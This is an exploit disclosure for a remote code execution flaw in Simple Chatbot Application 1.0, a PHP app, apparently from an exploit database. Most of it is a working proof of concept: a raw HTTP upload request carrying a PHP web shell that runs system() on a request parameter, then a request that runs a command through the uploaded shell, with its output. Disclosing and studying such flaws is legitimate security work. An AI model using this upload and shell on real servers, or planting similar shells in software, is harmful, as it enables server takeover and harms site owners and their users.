# Exploit Title: Simple Chatbot Application 1.0 - Remote Code Execution (RCE)
# Date: 18/01/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14788/simple-chatbot-application-using-php-source-code.html
# Version: 1.0
# Tested on: XAMPP, Windows 10


# Exploit  : 
 
You can upload a php shell file as a bot_avatar or user_avatar or image

# ------------------------------------------------------------------------------------------
# POC
# ------------------------------------------------------------------------------------------

# Request sent as base user

POST /classes/SystemSettings.php?f=update_settings HTTP/1.1
Host: localhost.SA
Cookie: PHPSESSID=vgs6dm14ubfcmbi4kvgod1jeb4; _ga=GA1.2.1002000635.1642463002; _gid=GA1.2.990020096.1642463002
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------55217074722533208072616276474
Content-Length: 1121
Connection: close

-----------------------------55217074722533208072616276474
Content-Disposition: form-data; name="name"


-----------------------------55217074722533208072616276474
Content-Disposition: form-data; name="short_name"


-----------------------------55217074722533208072616276474
Content-Disposition: form-data; name="intro"


-----------------------------55217074722533208072616276474
Content-Disposition: form-data; name="no_result"


-----------------------------55217074722533208072616276474
Content-Disposition: form-data; name="img"; filename=""
Content-Type: image/jpeg


-----------------------------55217074722533208072616276474
Content-Disposition: form-data; name="bot_avatar"; filename="bot_avatar.php"
Content-Type: application/octet-stream

<?php
if($_REQUEST['s']) {
  system($_REQUEST['s']);
  } else phpinfo();
?>
</pre>
</body>
</html>
-----------------------------55217074722533208072616276474
Content-Disposition: form-data; name="user_avatar"; filename=""
Content-Type: application/octet-stream


-----------------------------55217074722533208072616276474--


# Response

HTTP/1.1 200 OK
Date: Tue, 18 Jan 2022 00:51:29 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12
X-Powered-By: PHP/8.0.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 119
Connection: close
Content-Type: text/html; charset=UTF-8

1

# ------------------------------------------------------------------------------------------
# Request to webshell
# ------------------------------------------------------------------------------------------

GET /uploads/bot_avatar.php?s=echo+0xSaudi HTTP/1.1
Host: localhost.SA
Cookie: PHPSESSID=vgs6dm14ubfcmbi4kvgod1jeb4; _ga=GA1.2.1002000635.1642463002; _gid=GA1.2.990020096.1642463002
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Connection: close

# ------------------------------------------------------------------------------------------
# Webshell response
# ------------------------------------------------------------------------------------------

HTTP/1.1 200 OK
Date: Tue, 18 Jan 2022 00:51:29 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12
X-Powered-By: PHP/8.0.12
Content-Length: 16
Connection: close
Content-Type: text/html; charset=UTF-8

<pre>0xSaudi
</pre>